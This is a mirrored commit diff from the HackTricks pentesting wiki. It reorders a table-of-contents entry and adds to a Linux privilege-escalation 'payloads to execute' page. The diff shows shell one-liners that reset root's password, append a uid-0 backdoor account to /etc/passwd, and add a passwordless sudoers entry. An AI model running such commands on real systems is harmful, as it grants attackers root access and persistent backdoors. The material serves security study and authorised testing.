mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 22:18:27 +00:00
GitBook: [master] 2 pages modified
This commit is contained in:
parent
58caa6823e
commit
9dad931ad7
2 changed files with 5 additions and 1 deletions
|
@ -35,11 +35,11 @@
|
||||||
* [ld.so exploit example](linux-unix/privilege-escalation/ld.so.conf-example.md)
|
* [ld.so exploit example](linux-unix/privilege-escalation/ld.so.conf-example.md)
|
||||||
* [Linux Capabilities](linux-unix/privilege-escalation/linux-capabilities.md)
|
* [Linux Capabilities](linux-unix/privilege-escalation/linux-capabilities.md)
|
||||||
* [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md)
|
* [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md)
|
||||||
|
* [Payloads to execute](linux-unix/privilege-escalation/payloads-to-execute.md)
|
||||||
* [RunC Privilege Escalation](linux-unix/privilege-escalation/runc-privilege-escalation.md)
|
* [RunC Privilege Escalation](linux-unix/privilege-escalation/runc-privilege-escalation.md)
|
||||||
* [Splunk LPE and Persistence](linux-unix/privilege-escalation/splunk-lpe-and-persistence.md)
|
* [Splunk LPE and Persistence](linux-unix/privilege-escalation/splunk-lpe-and-persistence.md)
|
||||||
* [SSH Forward Agent exploitation](linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md)
|
* [SSH Forward Agent exploitation](linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md)
|
||||||
* [Socket Command Injection](linux-unix/privilege-escalation/socket-command-injection.md)
|
* [Socket Command Injection](linux-unix/privilege-escalation/socket-command-injection.md)
|
||||||
* [Payloads to execute](linux-unix/privilege-escalation/payloads-to-execute.md)
|
|
||||||
* [Wildcards Spare tricks](linux-unix/privilege-escalation/wildcards-spare-tricks.md)
|
* [Wildcards Spare tricks](linux-unix/privilege-escalation/wildcards-spare-tricks.md)
|
||||||
* [Useful Linux Commands](linux-unix/useful-linux-commands/README.md)
|
* [Useful Linux Commands](linux-unix/useful-linux-commands/README.md)
|
||||||
* [Bypass Bash Restrictions](linux-unix/useful-linux-commands/bypass-bash-restrictions.md)
|
* [Bypass Bash Restrictions](linux-unix/useful-linux-commands/bypass-bash-restrictions.md)
|
||||||
|
|
|
@ -53,5 +53,9 @@ echo "root:hacked" | chpasswd
|
||||||
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
|
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Add user to sudoers
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo "<username> ALL=NOPASSWD:ALL" >> /etc/sudoers
|
||||||
|
```
|
||||||
|
|
||||||
|
|
Loading…
Add table
Reference in a new issue